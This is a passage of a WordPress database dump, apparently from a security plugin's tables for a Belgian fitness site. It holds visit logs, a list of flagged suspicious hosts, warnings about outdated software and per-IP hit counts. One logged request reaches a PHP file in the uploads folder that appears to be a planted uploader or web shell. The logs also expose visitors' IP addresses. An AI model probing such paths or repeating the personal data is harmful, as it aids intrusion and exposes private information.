(77651, 1500402062.437169, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77652, 1500402063.561305, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77653, 1500402064.489655, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77654, 1500402065.072392, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77655, 1500402065.491967, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77656, 1500402065.902275, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77657, 1500402066.419472, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77658, 1500402066.939720, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77659, 1500402358.853708, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77660, 1500402612.766336, 2637637538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77661, 1500403563.742117, 873502953, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; heritrix/2.0.2-SNAPSHOT-20120411.000335 +http://www.expertsearch.nl +@OPERATOR_FROM@)'),
(77662, 1500403566.766632, 873502953, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; heritrix/2.0.2-SNAPSHOT-20120411.000335 +http://www.expertsearch.nl +@OPERATOR_FROM@)'),
(77663, 1500404415.853599, 1427857479, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1; LENNY2 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36'),
(77664, 1500404602.034152, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/41.0.2272.118 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77665, 1500406154.830821, 1532381390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com/', 'Mozilla/5.0 (Linux; Android 4.4.2; HUAWEI Y625-U51 Build/HUAWEIY625-U51) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/104.0.0.17.71;]'),
(77666, 1500407884.721999, 3024883471, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(77667, 1500416154.206548, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77668, 1500418686.192169, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77669, 1500420623.016181, 1538592859, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77670, 1500420625.168364, 1538592859, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77671, 1500420632.006100, 1538592859, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77672, 1500421598.018440, 2916154802, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_55_08) AppleWebKit/534.03.66 (KHTML, like Gecko) Chrome/53.6.1594.7867 Safari/530.74 Edge/34.70457'),
(77673, 1500421601.687612, 2916154802, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_55_08) AppleWebKit/534.03.66 (KHTML, like Gecko) Chrome/53.6.1594.7867 Safari/530.74 Edge/34.70457'),
(77674, 1500421955.089649, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77675, 1500425058.625661, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(77676, 1500425059.909682, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(77677, 1500427023.245283, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77678, 1500435517.702426, 3657084759, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77679, 1500435655.363157, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/2015/05/upl.php', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(77680, 1500439195.426018, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77681, 1500439196.050976, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77682, 1500445990.105411, 2637637538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77683, 1500448654.708693, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77684, 1500451973.712725, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77685, 1500453595.820375, 2513063484, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(77686, 1500471303.181661, 1055643893, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(77687, 1500471304.251189, 1055643893, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(77688, 1500471308.294249, 1055643893, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(77689, 1500471311.728795, 1055643893, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(77690, 1500471312.252718, 1055643893, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(77691, 1500471315.189566, 1055643893, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063');

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfHoover`
--

CREATE TABLE `wp_wfHoover` (
  `id` int(10) UNSIGNED NOT NULL,
  `owner` text,
  `host` text,
  `path` text,
  `hostKey` binary(4) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfHoover`
--

INSERT INTO `wp_wfHoover` (`id`, `owner`, `host`, `path`, `hostKey`) VALUES
(1, '1', 'fjiauool.com', '/', 0x0c2e4e02),
(2, '1', 'stpicks.com', '/27', 0x2ac36238),
(3, '1', 'pcgroup.com.uy', '/15', 0x296f4be1),
(4, '1', 'pcgroup.com.uy', '/15', 0xbe7f7f70),
(5, '1', 'pcgroup.com.uy', '/2a', 0x296f4be1),
(6, '1', 'pcgroup.com.uy', '/2a', 0xbe7f7f70),
(7, '1', '81.171.81.55', '/', 0x2b03814e);

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfIssues`
--

CREATE TABLE `wp_wfIssues` (
  `id` int(10) UNSIGNED NOT NULL,
  `time` int(10) UNSIGNED NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) UNSIGNED NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text,
  `data` text
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfIssues`
--

INSERT INTO `wp_wfIssues` (`id`, `time`, `status`, `type`, `severity`, `ignoreP`, `ignoreC`, `shortMsg`, `longMsg`, `data`) VALUES
(11220, 1492320260, 'new', 'wfPluginUpgrade', 1, '251c4825d966f36385a37786514c8853', '251c4825d966f36385a37786514c8853', 'The Plugin \"Slideshow Manager\" needs an upgrade.', 'You need to upgrade \"Slideshow Manager\" to the newest version to ensure you have any security fixes the developer has released.', 'a:12:{s:4:\"Name\";s:17:\"Slideshow Manager\";s:9:\"PluginURI\";s:34:\"http://rasmus.pw/slideshow-manager\";s:7:\"Version\";s:5:\"2.1.2\";s:11:\"Description\";s:125:\"Slideshow Manager for Wordpress <cite>By <a href=\"http://rasmus.pw\" title=\"Visit author homepage\">Rasmus Johanson</a>.</cite>\";s:6:\"Author\";s:76:\"<a href=\"http://rasmus.pw\" title=\"Visit author homepage\">Rasmus Johanson</a>\";s:9:\"AuthorURI\";s:16:\"http://rasmus.pw\";s:10:\"TextDomain\";s:0:\"\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:96:\"<a href=\"http://rasmus.pw/slideshow-manager\" title=\"Visit plugin homepage\">Slideshow Manager</a>\";s:10:\"AuthorName\";s:15:\"Rasmus Johanson\";s:10:\"newVersion\";s:5:\"2.1.3\";}'),
(11221, 1492320260, 'new', 'wfThemeUpgrade', 1, 'c6c751f2716d4a026208678db23e15f4', 'c6c751f2716d4a026208678db23e15f4', 'The Theme \"Figero\" needs an upgrade.', 'You need to upgrade \"Figero\" to the newest version to ensure you have any security fixes the developer has released.', 'a:5:{s:10:\"newVersion\";s:5:\"1.5.6\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/figero.1.5.6.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/figero/\";s:4:\"name\";s:6:\"Figero\";s:7:\"version\";s:5:\"1.5.1\";}'),
(11218, 1492320260, 'new', 'wfPluginUpgrade', 1, '0647b9cfc99d721a9bfa1a6c42f780ec', '0647b9cfc99d721a9bfa1a6c42f780ec', 'The Plugin \"Display widgets\" needs an upgrade.', 'You need to upgrade \"Display widgets\" to the newest version to ensure you have any security fixes the developer has released.', 'a:12:{s:4:\"Name\";s:15:\"Display widgets\";s:9:\"PluginURI\";s:38:\"http://strategy11.com/display-widgets/\";s:7:\"Version\";s:4:\"1.24\";s:11:\"Description\";s:155:\"Adds checkboxes to each widget to show or hide on site pages. <cite>By <a href=\"http://strategy11.com\" title=\"Visit author homepage\">Strategy11</a>.</cite>\";s:6:\"Author\";s:76:\"<a href=\"http://strategy11.com\" title=\"Visit author homepage\">Strategy11</a>\";s:9:\"AuthorURI\";s:21:\"http://strategy11.com\";s:10:\"TextDomain\";s:0:\"\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:98:\"<a href=\"http://strategy11.com/display-widgets/\" title=\"Visit plugin homepage\">Display widgets</a>\";s:10:\"AuthorName\";s:10:\"Strategy11\";s:10:\"newVersion\";s:4:\"2.05\";}'),
(11219, 1492320260, 'new', 'wfPluginUpgrade', 1, '25131a8272a928df146fde866da7d216', '25131a8272a928df146fde866da7d216', 'The Plugin \"Google Analyticator\" needs an upgrade.', 'You need to upgrade \"Google Analyticator\" to the newest version to ensure you have any security fixes the developer has released.', 'a:12:{s:4:\"Name\";s:19:\"Google Analyticator\";s:9:\"PluginURI\";s:128:\"http://www.videousermanuals.com/google-analyticator/?utm_campaign=analyticator&#038;utm_medium=plugin&#038;utm_source=readme-txt\";s:7:\"Version\";s:5:\"6.4.5\";s:11:\"Description\";s:425:\"Adds the necessary JavaScript code to enable <a href=\"http://www.google.com/analytics/\">Google&#8217;s Analytics</a>. After enabling this plugin you need to authenticate with Google, then select your domain and you&#8217;re set. <cite>By <a href=\"http://www.videousermanuals.com/?utm_campaign=analyticator&#038;utm_medium=plugin&#038;utm_source=readme-txt\" title=\"Visit author homepage\">Video User Manuals Pty Ltd</a>.</cite>\";s:6:\"Author\";s:179:\"<a href=\"http://www.videousermanuals.com/?utm_campaign=analyticator&#038;utm_medium=plugin&#038;utm_source=readme-txt\" title=\"Visit author homepage\">Video User Manuals Pty Ltd</a>\";s:9:\"AuthorURI\";s:108:\"http://www.videousermanuals.com/?utm_campaign=analyticator&#038;utm_medium=plugin&#038;utm_source=readme-txt\";s:10:\"TextDomain\";s:19:\"google-analyticator\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:192:\"<a href=\"http://www.videousermanuals.com/google-analyticator/?utm_campaign=analyticator&#038;utm_medium=plugin&#038;utm_source=readme-txt\" title=\"Visit plugin homepage\">Google Analyticator</a>\";s:10:\"AuthorName\";s:26:\"Video User Manuals Pty Ltd\";s:10:\"newVersion\";s:5:\"6.5.3\";}'),
(11216, 1492320260, 'new', 'wfUpgrade', 1, '0ae1093452ea46624c9b7e527c789fa7', '0ae1093452ea46624c9b7e527c789fa7', 'Your WordPress version is out of date', 'WordPress version 4.7.3 is now available. Please upgrade immediately to get the latest security updates from WordPress.', 'a:2:{s:14:\"currentVersion\";s:6:\"3.7.19\";s:10:\"newVersion\";s:5:\"4.7.3\";}'),
(11217, 1492320260, 'new', 'wfPluginUpgrade', 1, 'f26b251a2acbfbd93e6583d1f1386c75', 'f26b251a2acbfbd93e6583d1f1386c75', 'The Plugin \"Akismet\" needs an upgrade.', 'You need to upgrade \"Akismet\" to the newest version to ensure you have any security fixes the developer has released.', 'a:12:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:31:\"http://akismet.com/?return=true\";s:7:\"Version\";s:6:\"2.5.10\";s:11:\"Description\";s:558:\"Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the &#8220;Activate&#8221; link to the left of this description, 2) <a href=\"http://akismet.com/get/?return=true\">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key. <cite>By <a href=\"http://automattic.com/wordpress-plugins/\" title=\"Visit author homepage\">Automattic</a>.</cite>\";s:6:\"Author\";s:95:\"<a href=\"http://automattic.com/wordpress-plugins/\" title=\"Visit author homepage\">Automattic</a>\";s:9:\"AuthorURI\";s:40:\"http://automattic.com/wordpress-plugins/\";s:10:\"TextDomain\";s:0:\"\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:83:\"<a href=\"http://akismet.com/?return=true\" title=\"Visit plugin homepage\">Akismet</a>\";s:10:\"AuthorName\";s:10:\"Automattic\";s:10:\"newVersion\";s:3:\"3.3\";}');

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfLeechers`
--

CREATE TABLE `wp_wfLeechers` (
  `eMin` int(10) UNSIGNED NOT NULL,
  `IP` int(10) UNSIGNED NOT NULL,
  `hits` int(10) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--
-- Déchargement des données de la table `wp_wfLeechers`
--

INSERT INTO `wp_wfLeechers` (`eMin`, `IP`, `hits`) VALUES
(24886298, 1338305741, 1),
(24886258, 1123632584, 1),
(24886386, 1123632437, 1),
(24886385, 1123632437, 1),
(24886380, 1123632437, 1),
(24886236, 3024883466, 1),
(24886374, 1123632437, 1),
(24886236, 3024883608, 1),
(24888172, 3267064321, 1),
(24888158, 3429212575, 1),
(24888081, 1837156116, 1),
(24886367, 1123632437, 1),
(24886361, 1123632437, 1),
(24886355, 1123632437, 1),
(24886347, 1123632437, 1),
(24886236, 3024883476, 1),
(24886154, 1338305741, 1),
(24886072, 1338305741, 1),
(24886018, 1338305741, 1),
(24885984, 1123632438, 1),
(24881240, 758618229, 9),
(24886341, 1123632437, 1),
(24886335, 1123632437, 1),
(24887779, 3492536660, 5),
(24887778, 3492536660, 2),
(24887766, 3392025247, 1),
(24887687, 2366158596, 1),
(24887687, 2996485408, 1),
(24886328, 1123632437, 1),
(24885446, 2661914122, 1),
(24881173, 1463941259, 2),
(24885400, 2783008832, 2),
(24885589, 1374841142, 2),
(24885487, 3342489294, 3),
(24885486, 3342489294, 1),
(24887687, 2366148291, 1),
(24887639, 2637637525, 1),
(24887580, 2760155479, 1),
(24887334, 2297635928, 4),
(24884955, 1123635091, 1),
(24886258, 1123632437, 1),
(24881173, 3024883472, 1),
(24881172, 1463941259, 1),
(24881171, 1463941259, 1),
(24881170, 1463941259, 1),
(24881169, 1463941259, 1),
(24885819, 1837165719, 1),
(24885399, 2783008832, 2),
(24881168, 1463941259, 1),
(24885269, 1338305741, 1),
(24885775, 3475901839, 1),
(24885774, 676177849, 2),
(24885975, 1338305741, 1),
(24885974, 1374841142, 1),
(24887333, 2297635928, 5),
(24887332, 2297635928, 3),
(24887291, 1123632454, 1),
(24887216, 2637637385, 1),
(24887207, 3641698364, 2),
(24887206, 3641698364, 2),
(24887205, 3641698364, 1),
(24885895, 2637637525, 1),
(24887192, 1837165719, 1),
(24887186, 1599420426, 2),
(24887180, 2760119799, 1),
(24887155, 786801766, 1),
(24887069, 876167319, 2),
(24887055, 3584051034, 1),
(24885830, 2366148270, 1),
(24887026, 1123632437, 1),
(24885830, 2996485408, 1),
(24885830, 2366158596, 1),
(24885264, 2499535434, 1),
(24887000, 1837382274, 1),
(24886950, 2509959393, 1),
(24886887, 1837486295, 1),
(24886878, 1837486295, 2),
(24886860, 1837165719, 1),
(24886809, 3242976508, 1),
(24886796, 1123632437, 1),
(24886665, 1123632437, 1),
(24886555, 772029058, 2),
(24886516, 1123632437, 1),
(24886516, 2637637525, 1),
(24886500, 2956707729, 1),
(24886496, 676177832, 1),
(24885088, 2499535434, 1),
(24886476, 1123632437, 1),
(24886460, 676177832, 1),
(24886415, 1123632437, 2),
(24886409, 1123632437, 1),
(24886404, 1123632437, 1),
(24886398, 1123632437, 2),
(24884117, 3587417960, 1),
(24884055, 3587417960, 1),
(24881010, 1123632454, 1),
(24885762, 3585419230, 1),
(24886284, 1123632437, 1),
(24885752, 3585419230, 1),
(24885751, 3585419230, 1),
(24885745, 1338305741, 1),
(24885685, 3639886562, 1),
(24885680, 3639886562, 1),
(24885671, 2509960529, 1),
(24885590, 1338305741, 1),
(24884052, 3587417960, 1),
(24884051, 3587417960, 1),
(24881000, 1123632454, 1),
(24884050, 3587417960, 1),
(24885031, 96753435, 1),
(24880986, 2297635928, 5),
(24883910, 2297635928, 5),
(24883907, 2297635928, 1),
(24885030, 3652617287, 1),
(24883906, 2297635928, 2),
(24883905, 1837933865, 1),
(24883902, 1837933865, 1),
(24883902, 2297635928, 2),
(24883842, 400891747, 1),
(24883733, 676177850, 1),
(24883608, 632890059, 1),
(24883580, 1538649748, 1),
(24881297, 1837165719, 1),
(24883574, 1538649748, 1),
(24883561, 1837165719, 1),
(24884945, 520974917, 1),
(24884943, 1837858581, 1),
(24880985, 2297635928, 5),
(24880984, 2297635928, 3),
(24880888, 1123632454, 1),
(24880826, 1123632454, 2),
(24880799, 2655380742, 3),
(24884657, 2637637586, 1),
(24884455, 676177817, 2),
(24880798, 2655380742, 7),
(24880766, 1123632454, 1),
(24880736, 2637637570, 2),
(24880719, 1837522582, 1),
(24880718, 1837522582, 2),
(24880650, 1123633542, 1),
(24880622, 3475901863, 1),
(24884424, 3024883592, 1),
(24884399, 1439296427, 1),
(24884381, 3475901711, 1),
(24884348, 3639886562, 1),
(24884342, 3639886562, 1),
(24884167, 1078646641, 1),
(24882731, 1123631302, 1),
(24882705, 676177685, 1),
(24882660, 1123631302, 1),
(24882617, 2637637575, 1),
(24882615, 1123631302, 2),
(24882615, 1123631176, 1),
(24883551, 2954838202, 1),
(24883516, 1837165719, 1),
(24883236, 2499535434, 1),
(24883113, 1123631302, 1),
(24883070, 2499535434, 1),
(24883044, 2996488207, 1),
(24883013, 676177832, 1),
(24882918, 676177687, 2),
(24882910, 1374841142, 2),
(24882908, 1605828477, 1),
(24882895, 2071806885, 1),
(24882895, 2071807790, 1),
(24880584, 1123633542, 1),
(24880523, 1123633542, 1),
(24880523, 1123633430, 1),
(24882883, 1123631302, 1),
(24882854, 1837165719, 1),
(24882603, 1567842252, 1),
(24882399, 2655379749, 11),
(24882387, 1123631313, 1),
(24882313, 1834499396, 1),
(24882287, 676177833, 2),
(24882263, 1439284665, 1),
(24882262, 1439284665, 3),
(24881774, 2499535434, 1),
(24880514, 2499535434, 1),
(24880394, 2499535434, 1),
(24880301, 1123633542, 2),
(24880230, 3652617279, 1),
(24880205, 2637637570, 1),
(24881714, 3639886562, 1),
(24881703, 3639886562, 1),
(24881653, 2499535434, 1),
(24881637, 2366158866, 1),
(24881566, 676177851, 1),
(24881566, 1796538632, 1),
(24881492, 1123632454, 1),
(24881386, 1837165719, 1),
(24881382, 3024883472, 1),
(24881341, 1159648650, 3),
(24880164, 635281730, 1),
(24880151, 1588718379, 1),
(24880140, 2990433199, 1),
(24880135, 3423455625, 1),
(24880135, 1806877237, 1),
(24880110, 676177817, 1),
(24880098, 3024883463, 1),
(24882766, 1123631302, 1),
(24882762, 1837165719, 1),
(24880045, 693628318, 3),
(24880032, 1837165719, 1),
(24888205, 2995859706, 1),
(24888419, 676177811, 1),
(24888419, 2637637595, 1),
(24888420, 1837953980, 1),
(24888422, 3475901820, 1),
(24888560, 1049233326, 1),
(24888605, 1837857107, 1),
(24888772, 1374841142, 2),
(24888877, 2905398467, 1),
(24888948, 2996488257, 1),
(24889016, 1833311020, 1),
(24889029, 2499535434, 1),
(24889194, 2499535434, 1),
(24889501, 3339975108, 3),
(24889501, 3234106972, 3),
(24889577, 1538649748, 2),
(24889684, 1375112542, 1),
(24889722, 3323226906, 1),
(24889861, 629871318, 2),
(24889871, 629871318, 1),
(24889876, 629871318, 1),
(24889880, 629871318, 1),
(24889940, 3587417960, 1),
(24889941, 3587417960, 2),
(24890187, 1374824443, 1),
(24890198, 2499535434, 1),
(24890294, 2509962920, 1),
(24890295, 2509962920, 2),
(24890297, 2509962920, 1),
(24890297, 2954838202, 1),
(24890318, 2499535434, 1),
(24890361, 2509963089, 1),
(24890427, 3024883471, 1),
(24890708, 1540531433, 1),
(24890890, 3162553515, 1),
(24891065, 1538506743, 1),
(24891066, 1538506743, 1),
(24891068, 1538506743, 2),
(24891158, 3107604753, 2),
(24891184, 2760155453, 1),
(24891184, 96753435, 1),
(24891313, 1123631646, 1),
(24891324, 2366148252, 1),
(24891324, 2366148120, 1),
(24891324, 2996485381, 1),
(24891324, 2996488207, 1),
(24891353, 1123631762, 1),
(24891353, 1123631630, 2),
(24891509, 1374841142, 2),
(24891528, 2297635928, 2),
(24891529, 2297635928, 6),
(24891530, 2297635928, 4),
(24891531, 2297635928, 1),
(24891532, 2297635928, 1),
(24891548, 2637637379, 1),
(24891550, 2637637511, 1),
(24891563, 1538461206, 1),
(24891564, 1375112542, 1),
(24891684, 1123634273, 1),
(24891806, 1123634273, 1),
(24891832, 1374774657, 2),
(24891875, 1450079886, 2),
(24891913, 3024883603, 1),
(24891958, 1123631630, 1),
(24891974, 1123634273, 1),
(24891994, 1123634273, 1),
(24892055, 1123634273, 1),
(24892218, 1123631630, 1),
(24892221, 3475901821, 1),
(24892228, 2637637474, 1),
(24892270, 676177816, 2),
(24892332, 2637637590, 1),
(24892787, 3024883468, 1),
(24892829, 3657084251, 1),
(24892848, 1375112542, 1),
(24892854, 1741628807, 1),
(24892994, 1375112542, 1),
(24893150, 3657084251, 1),
(24893187, 1572356835, 1),
(24893298, 2637637384, 2),
(24893305, 3657084251, 1),
(24893535, 1338306177, 1),
(24893578, 1338306177, 1),
(24893632, 1338306177, 1),
(24893696, 1538649748, 1),
(24893714, 1338306177, 1),
(24893853, 1834495119, 1),
(24893854, 1834495119, 3),
(24893858, 1338306177, 1),
(24893916, 3024883597, 1),
(24893962, 1538649748, 1),
(24893971, 1837906296, 1),
(24894018, 676177808, 2),
(24894050, 1355294142, 1),
(24894129, 1375112542, 1),
(24894137, 1355389698, 2),
(24894161, 2071806885, 1),
(24894161, 3702862679, 1),
(24894164, 1375112542, 1),
(24894170, 1538699446, 5),
(24894176, 786802763, 1),
(24894208, 1570674703, 1),
(24894208, 100662543, 1),
(24894208, 2366158608, 1),
(24894216, 1834516790, 4),
(24894230, 1375112542, 1),
(24894233, 2071807832, 1),
(24894293, 2760155399, 1),
(24894293, 96753435, 1),
(24894523, 1374841142, 2),
(24894657, 1123632467, 1),
(24894740, 2637637377, 2),
(24894763, 1123632436, 1),
(24894763, 1123632454, 2),
(24895050, 3652617267, 1),
(24895063, 1123632454, 1),
(24895090, 2901740117, 1),
(24895175, 1123632454, 1),
(24895256, 1584237938, 1),
(24895304, 1837860862, 1),
(24895316, 1753445547, 9),
(24895394, 1375112542, 1),
(24895426, 3652617232, 1),
(24895473, 2989639598, 2),
(24895616, 1539837611, 1),
(24895636, 2644818889, 1),
(24895651, 1374841142, 2),
(24895707, 2509962544, 1),
(24895792, 2509962544, 1),
(24895961, 676177835, 1),
(24895971, 1123632475, 1),
(24895987, 1152705560, 2),
(24896052, 1123632454, 1),
(24896108, 1123632437, 1),
(24896194, 1123633542, 1),
(24896242, 1123633542, 2),
(24896298, 1123633430, 1),
(24896298, 1123633542, 1),
